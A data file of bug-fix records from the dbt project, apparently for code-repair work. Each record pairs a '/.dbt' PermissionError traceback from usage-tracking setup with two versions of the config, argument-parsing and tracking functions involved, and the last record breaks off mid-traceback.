[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def __init__(
self,
project_name,
version,
project_root,
source_paths,
macro_paths,
data_paths,
test_paths,
analysis_paths,
docs_paths,
target_path,
clean_targets,
log_path,
modules_path,
quoting,
models,
on_run_start,
on_run_end,
archive,
seeds,
profile_name,
target_name,
config,
threads,
credentials,
packages,
args,
):
# 'vars'
self.args = args
self.cli_vars = dbt.utils.parse_cli_vars(getattr(args, "vars", "{}"))
# 'project'
Project.__init__(
self,
project_name=project_name,
version=version,
project_root=project_root,
profile_name=profile_name,
source_paths=source_paths,
macro_paths=macro_paths,
data_paths=data_paths,
test_paths=test_paths,
analysis_paths=analysis_paths,
docs_paths=docs_paths,
target_path=target_path,
clean_targets=clean_targets,
log_path=log_path,
modules_path=modules_path,
quoting=quoting,
models=models,
on_run_start=on_run_start,
on_run_end=on_run_end,
archive=archive,
seeds=seeds,
packages=packages,
)
# 'profile'
Profile.__init__(
self,
profile_name=profile_name,
target_name=target_name,
config=config,
threads=threads,
credentials=credentials,
)
self.validate()
|
def __init__(
self,
project_name,
version,
project_root,
source_paths,
macro_paths,
data_paths,
test_paths,
analysis_paths,
docs_paths,
target_path,
clean_targets,
log_path,
modules_path,
quoting,
models,
on_run_start,
on_run_end,
archive,
seeds,
profile_name,
target_name,
send_anonymous_usage_stats,
use_colors,
threads,
credentials,
packages,
args,
):
# 'vars'
self.args = args
self.cli_vars = dbt.utils.parse_cli_vars(getattr(args, "vars", "{}"))
# 'project'
Project.__init__(
self,
project_name=project_name,
version=version,
project_root=project_root,
profile_name=profile_name,
source_paths=source_paths,
macro_paths=macro_paths,
data_paths=data_paths,
test_paths=test_paths,
analysis_paths=analysis_paths,
docs_paths=docs_paths,
target_path=target_path,
clean_targets=clean_targets,
log_path=log_path,
modules_path=modules_path,
quoting=quoting,
models=models,
on_run_start=on_run_start,
on_run_end=on_run_end,
archive=archive,
seeds=seeds,
packages=packages,
)
# 'profile'
Profile.__init__(
self,
profile_name=profile_name,
target_name=target_name,
send_anonymous_usage_stats=send_anonymous_usage_stats,
use_colors=use_colors,
threads=threads,
credentials=credentials,
)
self.validate()
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def from_parts(cls, project, profile, args):
"""Instantiate a RuntimeConfig from its components.
:param profile Profile: A parsed dbt Profile.
:param project Project: A parsed dbt Project.
:param args argparse.Namespace: The parsed command-line arguments.
:returns RuntimeConfig: The new configuration.
"""
quoting = deepcopy(
get_relation_class_by_name(profile.credentials.type).DEFAULTS["quote_policy"]
)
quoting.update(project.quoting)
return cls(
project_name=project.project_name,
version=project.version,
project_root=project.project_root,
source_paths=project.source_paths,
macro_paths=project.macro_paths,
data_paths=project.data_paths,
test_paths=project.test_paths,
analysis_paths=project.analysis_paths,
docs_paths=project.docs_paths,
target_path=project.target_path,
clean_targets=project.clean_targets,
log_path=project.log_path,
modules_path=project.modules_path,
quoting=quoting,
models=project.models,
on_run_start=project.on_run_start,
on_run_end=project.on_run_end,
archive=project.archive,
seeds=project.seeds,
packages=project.packages,
profile_name=profile.profile_name,
target_name=profile.target_name,
config=profile.config,
threads=profile.threads,
credentials=profile.credentials,
args=args,
)
|
def from_parts(cls, project, profile, args):
"""Instantiate a RuntimeConfig from its components.
:param profile Profile: A parsed dbt Profile.
:param project Project: A parsed dbt Project.
:param args argparse.Namespace: The parsed command-line arguments.
:returns RuntimeConfig: The new configuration.
"""
quoting = deepcopy(
get_relation_class_by_name(profile.credentials.type).DEFAULTS["quote_policy"]
)
quoting.update(project.quoting)
return cls(
project_name=project.project_name,
version=project.version,
project_root=project.project_root,
source_paths=project.source_paths,
macro_paths=project.macro_paths,
data_paths=project.data_paths,
test_paths=project.test_paths,
analysis_paths=project.analysis_paths,
docs_paths=project.docs_paths,
target_path=project.target_path,
clean_targets=project.clean_targets,
log_path=project.log_path,
modules_path=project.modules_path,
quoting=quoting,
models=project.models,
on_run_start=project.on_run_start,
on_run_end=project.on_run_end,
archive=project.archive,
seeds=project.seeds,
packages=project.packages,
profile_name=profile.profile_name,
target_name=profile.target_name,
send_anonymous_usage_stats=profile.send_anonymous_usage_stats,
use_colors=profile.use_colors,
threads=profile.threads,
credentials=profile.credentials,
args=args,
)
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def handle_and_check(args):
parsed = parse_args(args)
profiler_enabled = False
if parsed.record_timing_info:
profiler_enabled = True
with dbt.profiler.profiler(
enable=profiler_enabled, outfile=parsed.record_timing_info
):
initialize_config_values(parsed)
reset_adapters()
try:
task, res = run_from_args(parsed)
finally:
dbt.tracking.flush()
success = task.interpret_results(res)
return res, success
|
def handle_and_check(args):
parsed = parse_args(args)
profiler_enabled = False
if parsed.record_timing_info:
profiler_enabled = True
with dbt.profiler.profiler(
enable=profiler_enabled, outfile=parsed.record_timing_info
):
# this needs to happen after args are parsed so we can determine the
# correct profiles.yml file
profile_config = read_config(parsed.profiles_dir)
if not send_anonymous_usage_stats(profile_config):
dbt.tracking.do_not_track()
else:
dbt.tracking.initialize_tracking()
if colorize_output(profile_config):
dbt.ui.printer.use_colors()
reset_adapters()
try:
task, res = run_from_args(parsed)
finally:
dbt.tracking.flush()
success = task.interpret_results(res)
return res, success
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def parse_args(args):
p = DBTArgumentParser(
prog="dbt: data build tool",
formatter_class=argparse.RawTextHelpFormatter,
description="An ELT tool for managing your SQL "
"transformations and data models."
"\nFor more documentation on these commands, visit: "
"docs.getdbt.com",
epilog="Specify one of these sub-commands and you can "
"find more help from there.",
)
p.add_argument("--version", action="dbtversion", help="Show version information")
p.add_argument(
"-r",
"--record-timing-info",
default=None,
type=str,
help="""
When this option is passed, dbt will output low-level timing
stats to the specified file. Example:
`--record-timing-info output.profile`
""",
)
p.add_argument(
"-d",
"--debug",
action="store_true",
help="""Display debug logging during dbt execution. Useful for
debugging and making bug reports.""",
)
p.add_argument(
"-S",
"--strict",
action="store_true",
help="""Run schema validations at runtime. This will surface
bugs in dbt, but may incur a performance penalty.""",
)
# if set, run dbt in single-threaded mode: thread count is ignored, and
# calls go through `map` instead of the thread pool. This is useful for
# getting performance information about aspects of dbt that normally run in
# a thread, as the profiler ignores child threads. Users should really
# never use this.
p.add_argument(
"--single-threaded",
action="store_true",
help=argparse.SUPPRESS,
)
subs = p.add_subparsers(title="Available sub-commands")
base_subparser = argparse.ArgumentParser(add_help=False)
base_subparser.add_argument(
"--profiles-dir",
default=PROFILES_DIR,
type=str,
help="""
Which directory to look in for the profiles.yml file. Default = {}
""".format(PROFILES_DIR),
)
base_subparser.add_argument(
"--profile",
required=False,
type=str,
help="""
Which profile to load. Overrides setting in dbt_project.yml.
""",
)
base_subparser.add_argument(
"--target",
default=None,
type=str,
help="Which target to load for the given profile",
)
base_subparser.add_argument(
"--vars",
type=str,
default="{}",
help="""
Supply variables to the project. This argument overrides
variables defined in your dbt_project.yml file. This argument
should be a YAML string, eg. '{my_variable: my_value}'""",
)
# if set, log all cache events. This is extremely verbose!
base_subparser.add_argument(
"--log-cache-events",
action="store_true",
help=argparse.SUPPRESS,
)
base_subparser.add_argument(
"--bypass-cache",
action="store_false",
dest="use_cache",
help="If set, bypass the adapter-level cache of database state",
)
sub = subs.add_parser(
"init", parents=[base_subparser], help="Initialize a new DBT project."
)
sub.add_argument("project_name", type=str, help="Name of the new project")
sub.set_defaults(cls=init_task.InitTask, which="init")
sub = subs.add_parser(
"clean",
parents=[base_subparser],
help="Delete all folders in the clean-targets list"
"\n(usually the dbt_modules and target directories.)",
)
sub.set_defaults(cls=clean_task.CleanTask, which="clean")
sub = subs.add_parser(
"debug",
parents=[base_subparser],
help="Show some helpful information about dbt for debugging."
"\nNot to be confused with the --debug option which increases "
"verbosity.",
)
sub.add_argument(
"--config-dir",
action="store_true",
help="""
If specified, DBT will show path information for this project
""",
)
sub.set_defaults(cls=debug_task.DebugTask, which="debug")
sub = subs.add_parser(
"deps",
parents=[base_subparser],
help="Pull the most recent version of the dependencies listed in packages.yml",
)
sub.set_defaults(cls=deps_task.DepsTask, which="deps")
sub = subs.add_parser(
"archive",
parents=[base_subparser],
help="Record changes to a mutable table over time."
"\nMust be configured in your dbt_project.yml.",
)
sub.add_argument(
"--threads",
type=int,
required=False,
help="""
Specify number of threads to use while archiving tables. Overrides
settings in profiles.yml.
""",
)
sub.set_defaults(cls=archive_task.ArchiveTask, which="archive")
run_sub = subs.add_parser(
"run",
parents=[base_subparser],
help="Compile SQL and execute against the current target database.",
)
run_sub.set_defaults(cls=run_task.RunTask, which="run")
compile_sub = subs.add_parser(
"compile",
parents=[base_subparser],
help="Generates executable SQL from source model, test, and"
"analysis files. \nCompiled SQL files are written to the target/"
"directory.",
)
compile_sub.set_defaults(cls=compile_task.CompileTask, which="compile")
docs_sub = subs.add_parser(
"docs",
parents=[base_subparser],
help="Generate or serve the documentation website for your project.",
)
docs_subs = docs_sub.add_subparsers()
# it might look like docs_sub is the correct parents entry, but that
# will cause weird errors about 'conflicting option strings'.
generate_sub = docs_subs.add_parser("generate", parents=[base_subparser])
generate_sub.set_defaults(cls=generate_task.GenerateTask, which="generate")
generate_sub.add_argument(
"--no-compile",
action="store_false",
dest="compile",
help='Do not run "dbt compile" as part of docs generation',
)
for sub in [run_sub, compile_sub, generate_sub]:
sub.add_argument(
"-m",
"--models",
required=False,
nargs="+",
help="""
Specify the models to include.
""",
)
sub.add_argument(
"--exclude",
required=False,
nargs="+",
help="""
Specify the models to exclude.
""",
)
sub.add_argument(
"--threads",
type=int,
required=False,
help="""
Specify number of threads to use while executing models. Overrides
settings in profiles.yml.
""",
)
sub.add_argument(
"--non-destructive",
action="store_true",
help="""
If specified, DBT will not drop views. Tables will be truncated
instead of dropped.
""",
)
sub.add_argument(
"--full-refresh",
action="store_true",
help="""
If specified, DBT will drop incremental models and
fully-recalculate the incremental table from the model definition.
""",
)
seed_sub = subs.add_parser(
"seed",
parents=[base_subparser],
help="Load data from csv files into your data warehouse.",
)
seed_sub.add_argument(
"--drop-existing",
action="store_true",
help="(DEPRECATED) Use --full-refresh instead.",
)
seed_sub.add_argument(
"--full-refresh",
action="store_true",
help="Drop existing seed tables and recreate them",
)
seed_sub.add_argument(
"--show",
action="store_true",
help="Show a sample of the loaded data in the terminal",
)
seed_sub.set_defaults(cls=seed_task.SeedTask, which="seed")
serve_sub = docs_subs.add_parser("serve", parents=[base_subparser])
serve_sub.add_argument(
"--port",
default=8080,
type=int,
help="Specify the port number for the docs server.",
)
serve_sub.set_defaults(cls=serve_task.ServeTask, which="serve")
sub = subs.add_parser(
"test",
parents=[base_subparser],
help="Runs tests on data in deployed models.Run this after `dbt run`",
)
sub.add_argument(
"--data",
action="store_true",
help='Run data tests defined in "tests" directory.',
)
sub.add_argument(
"--schema",
action="store_true",
help="Run constraint validations from schema.yml files",
)
sub.add_argument(
"--threads",
type=int,
required=False,
help="""
Specify number of threads to use while executing tests. Overrides
settings in profiles.yml
""",
)
sub.add_argument(
"-m",
"--models",
required=False,
nargs="+",
help="""
Specify the models to test.
""",
)
sub.add_argument(
"--exclude",
required=False,
nargs="+",
help="""
Specify the models to exclude from testing.
""",
)
sub.set_defaults(cls=test_task.TestTask, which="test")
if len(args) == 0:
p.print_help()
sys.exit(1)
parsed = p.parse_args(args)
parsed.profiles_dir = os.path.expanduser(parsed.profiles_dir)
if not hasattr(parsed, "which"):
# the user did not provide a valid subcommand. trigger the help message
# and exit with a error
p.print_help()
p.exit(1)
return parsed
|
def parse_args(args):
p = DBTArgumentParser(
prog="dbt: data build tool",
formatter_class=argparse.RawTextHelpFormatter,
description="An ELT tool for managing your SQL "
"transformations and data models."
"\nFor more documentation on these commands, visit: "
"docs.getdbt.com",
epilog="Specify one of these sub-commands and you can "
"find more help from there.",
)
p.add_argument("--version", action="dbtversion", help="Show version information")
p.add_argument(
"-r",
"--record-timing-info",
default=None,
type=str,
help="""
When this option is passed, dbt will output low-level timing
stats to the specified file. Example:
`--record-timing-info output.profile`
""",
)
p.add_argument(
"-d",
"--debug",
action="store_true",
help="""Display debug logging during dbt execution. Useful for
debugging and making bug reports.""",
)
p.add_argument(
"-S",
"--strict",
action="store_true",
help="""Run schema validations at runtime. This will surface
bugs in dbt, but may incur a performance penalty.""",
)
# if set, run dbt in single-threaded mode: thread count is ignored, and
# calls go through `map` instead of the thread pool. This is useful for
# getting performance information about aspects of dbt that normally run in
# a thread, as the profiler ignores child threads. Users should really
# never use this.
p.add_argument(
"--single-threaded",
action="store_true",
help=argparse.SUPPRESS,
)
subs = p.add_subparsers(title="Available sub-commands")
base_subparser = argparse.ArgumentParser(add_help=False)
base_subparser.add_argument(
"--profiles-dir",
default=PROFILES_DIR,
type=str,
help="""
Which directory to look in for the profiles.yml file. Default = {}
""".format(PROFILES_DIR),
)
base_subparser.add_argument(
"--profile",
required=False,
type=str,
help="""
Which profile to load. Overrides setting in dbt_project.yml.
""",
)
base_subparser.add_argument(
"--target",
default=None,
type=str,
help="Which target to load for the given profile",
)
base_subparser.add_argument(
"--vars",
type=str,
default="{}",
help="""
Supply variables to the project. This argument overrides
variables defined in your dbt_project.yml file. This argument
should be a YAML string, eg. '{my_variable: my_value}'""",
)
# if set, log all cache events. This is extremely verbose!
base_subparser.add_argument(
"--log-cache-events",
action="store_true",
help=argparse.SUPPRESS,
)
base_subparser.add_argument(
"--bypass-cache",
action="store_false",
dest="use_cache",
help="If set, bypass the adapter-level cache of database state",
)
sub = subs.add_parser(
"init", parents=[base_subparser], help="Initialize a new DBT project."
)
sub.add_argument("project_name", type=str, help="Name of the new project")
sub.set_defaults(cls=init_task.InitTask, which="init")
sub = subs.add_parser(
"clean",
parents=[base_subparser],
help="Delete all folders in the clean-targets list"
"\n(usually the dbt_modules and target directories.)",
)
sub.set_defaults(cls=clean_task.CleanTask, which="clean")
sub = subs.add_parser(
"debug",
parents=[base_subparser],
help="Show some helpful information about dbt for debugging."
"\nNot to be confused with the --debug option which increases "
"verbosity.",
)
sub.add_argument(
"--config-dir",
action="store_true",
help="""
If specified, DBT will show path information for this project
""",
)
sub.set_defaults(cls=debug_task.DebugTask, which="debug")
sub = subs.add_parser(
"deps",
parents=[base_subparser],
help="Pull the most recent version of the dependencies listed in packages.yml",
)
sub.set_defaults(cls=deps_task.DepsTask, which="deps")
sub = subs.add_parser(
"archive",
parents=[base_subparser],
help="Record changes to a mutable table over time."
"\nMust be configured in your dbt_project.yml.",
)
sub.add_argument(
"--threads",
type=int,
required=False,
help="""
Specify number of threads to use while archiving tables. Overrides
settings in profiles.yml.
""",
)
sub.set_defaults(cls=archive_task.ArchiveTask, which="archive")
run_sub = subs.add_parser(
"run",
parents=[base_subparser],
help="Compile SQL and execute against the current target database.",
)
run_sub.set_defaults(cls=run_task.RunTask, which="run")
compile_sub = subs.add_parser(
"compile",
parents=[base_subparser],
help="Generates executable SQL from source model, test, and"
"analysis files. \nCompiled SQL files are written to the target/"
"directory.",
)
compile_sub.set_defaults(cls=compile_task.CompileTask, which="compile")
docs_sub = subs.add_parser(
"docs",
parents=[base_subparser],
help="Generate or serve the documentation website for your project.",
)
docs_subs = docs_sub.add_subparsers()
# it might look like docs_sub is the correct parents entry, but that
# will cause weird errors about 'conflicting option strings'.
generate_sub = docs_subs.add_parser("generate", parents=[base_subparser])
generate_sub.set_defaults(cls=generate_task.GenerateTask, which="generate")
generate_sub.add_argument(
"--no-compile",
action="store_false",
dest="compile",
help='Do not run "dbt compile" as part of docs generation',
)
for sub in [run_sub, compile_sub, generate_sub]:
sub.add_argument(
"-m",
"--models",
required=False,
nargs="+",
help="""
Specify the models to include.
""",
)
sub.add_argument(
"--exclude",
required=False,
nargs="+",
help="""
Specify the models to exclude.
""",
)
sub.add_argument(
"--threads",
type=int,
required=False,
help="""
Specify number of threads to use while executing models. Overrides
settings in profiles.yml.
""",
)
sub.add_argument(
"--non-destructive",
action="store_true",
help="""
If specified, DBT will not drop views. Tables will be truncated
instead of dropped.
""",
)
sub.add_argument(
"--full-refresh",
action="store_true",
help="""
If specified, DBT will drop incremental models and
fully-recalculate the incremental table from the model definition.
""",
)
seed_sub = subs.add_parser(
"seed",
parents=[base_subparser],
help="Load data from csv files into your data warehouse.",
)
seed_sub.add_argument(
"--drop-existing",
action="store_true",
help="(DEPRECATED) Use --full-refresh instead.",
)
seed_sub.add_argument(
"--full-refresh",
action="store_true",
help="Drop existing seed tables and recreate them",
)
seed_sub.add_argument(
"--show",
action="store_true",
help="Show a sample of the loaded data in the terminal",
)
seed_sub.set_defaults(cls=seed_task.SeedTask, which="seed")
serve_sub = docs_subs.add_parser("serve", parents=[base_subparser])
serve_sub.add_argument(
"--port",
default=8080,
type=int,
help="Specify the port number for the docs server.",
)
serve_sub.set_defaults(cls=serve_task.ServeTask, which="serve")
sub = subs.add_parser(
"test",
parents=[base_subparser],
help="Runs tests on data in deployed models.Run this after `dbt run`",
)
sub.add_argument(
"--data",
action="store_true",
help='Run data tests defined in "tests" directory.',
)
sub.add_argument(
"--schema",
action="store_true",
help="Run constraint validations from schema.yml files",
)
sub.add_argument(
"--threads",
type=int,
required=False,
help="""
Specify number of threads to use while executing tests. Overrides
settings in profiles.yml
""",
)
sub.add_argument(
"-m",
"--models",
required=False,
nargs="+",
help="""
Specify the models to test.
""",
)
sub.add_argument(
"--exclude",
required=False,
nargs="+",
help="""
Specify the models to exclude from testing.
""",
)
sub.set_defaults(cls=test_task.TestTask, which="test")
if len(args) == 0:
p.print_help()
sys.exit(1)
parsed = p.parse_args(args)
if not hasattr(parsed, "which"):
# the user did not provide a valid subcommand. trigger the help message
# and exit with a error
p.print_help()
p.exit(1)
return parsed
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def __init__(self, cookie_dir):
self.do_not_track = True
self.cookie_dir = cookie_dir
self.id = None
self.invocation_id = str(uuid.uuid4())
self.run_started_at = datetime.now(tz=pytz.utc)
|
def __init__(self):
self.do_not_track = True
self.id = None
self.invocation_id = str(uuid.uuid4())
self.run_started_at = datetime.now(tz=pytz.utc)
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def set_cookie(self):
user = {"id": str(uuid.uuid4())}
dbt.clients.system.make_directory(self.cookie_dir)
with open(self.cookie_path, "w") as fh:
yaml.dump(user, fh)
return user
|
def set_cookie(self):
cookie_dir = os.path.dirname(COOKIE_PATH)
user = {"id": str(uuid.uuid4())}
dbt.clients.system.make_directory(cookie_dir)
with open(COOKIE_PATH, "w") as fh:
yaml.dump(user, fh)
return user
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def get_cookie(self):
if not os.path.isfile(self.cookie_path):
user = self.set_cookie()
else:
with open(self.cookie_path, "r") as fh:
try:
user = yaml.safe_load(fh)
if user is None:
user = self.set_cookie()
except yaml.reader.ReaderError:
user = self.set_cookie()
return user
|
def get_cookie(self):
if not os.path.isfile(COOKIE_PATH):
user = self.set_cookie()
else:
with open(COOKIE_PATH, "r") as fh:
try:
user = yaml.safe_load(fh)
if user is None:
user = self.set_cookie()
except yaml.reader.ReaderError:
user = self.set_cookie()
return user
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def do_not_track():
global active_user
active_user = User(None)
|
def do_not_track():
global active_user
active_user = User()
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def initialize_tracking(cookie_dir):
global active_user
active_user = User(cookie_dir)
try:
active_user.initialize()
except Exception:
logger.debug("Got an exception trying to initialize tracking", exc_info=True)
active_user = User(None)
|
def initialize_tracking():
global active_user
active_user = User()
active_user.initialize()
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
